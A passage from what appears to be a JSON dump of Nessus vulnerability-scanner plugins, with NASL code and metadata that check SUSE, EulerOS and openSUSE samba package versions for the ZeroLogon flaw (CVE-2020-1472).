(rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-debugsource-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-debuginfo-4.4.2-38.36.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:24:28", "description": "According to the version of the samba packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-09T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : samba (EulerOS-SA-2020-2171)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libsmbclient", "p-cpe:/a:huawei:euleros:libwbclient", "p-cpe:/a:huawei:euleros:samba", "p-cpe:/a:huawei:euleros:samba-client", "p-cpe:/a:huawei:euleros:samba-common", "p-cpe:/a:huawei:euleros:samba-common-tools", "p-cpe:/a:huawei:euleros:samba-libs", "p-cpe:/a:huawei:euleros:samba-winbind", "p-cpe:/a:huawei:euleros:samba-winbind-clients", "p-cpe:/a:huawei:euleros:samba-winbind-modules", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2171.NASL", "href": "https://www.tenable.com/plugins/nessus/141328", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141328);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"EulerOS 2.0 SP9 : samba (EulerOS-SA-2020-2171)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2171\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5afe159e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"libsmbclient-4.11.6-6.h8.eulerosv2r9\",\n \"libwbclient-4.11.6-6.h8.eulerosv2r9\",\n \"samba-4.11.6-6.h8.eulerosv2r9\",\n \"samba-client-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-tools-4.11.6-6.h8.eulerosv2r9\",\n \"samba-libs-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-clients-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-modules-4.11.6-6.h8.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:23:08", "description": "This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with some non default configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update project.", "cvss3": {}, "published": "2020-09-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : samba (openSUSE-2020-1513)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:samba-libs-python-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi-devel-32bit", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors-devel", "p-cpe:/a:novell:opensuse:libsamba-errors0", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libsamba-policy-python-devel", "p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel", "p-cpe:/a:novell:opensuse:libsamba-policy0", "p-cpe:/a:novell:opensuse:libsamba-policy0-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb-devel", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsmbldap2", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo", "p-cpe:/a:novell:opensuse:samba-pidl", "p-cpe:/a:novell:opensuse:samba-python", "p-cpe:/a:novell:opensuse:samba-python-debuginfo", "p-cpe:/a:novell:opensuse:samba-python3", "p-cpe:/a:novell:opensuse:samba-python3-debuginfo", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:samba-ad-dc", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo", "p-cpe:/a:novell:opensuse:samba-ceph", "p-cpe:/a:novell:opensuse:samba-ceph-debuginfo", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:samba-dsdb-modules", "p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python"], "id": "OPENSUSE-2020-1513.NASL", "href": "https://www.tenable.com/plugins/nessus/140797", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1513.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140797);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-2020-1513)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with\n some non default configurations when an attacker\n established a vulnerable Netlogon secure channel\n connection to a domain controller, using the Netlogon\n Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nThis update was imported from the 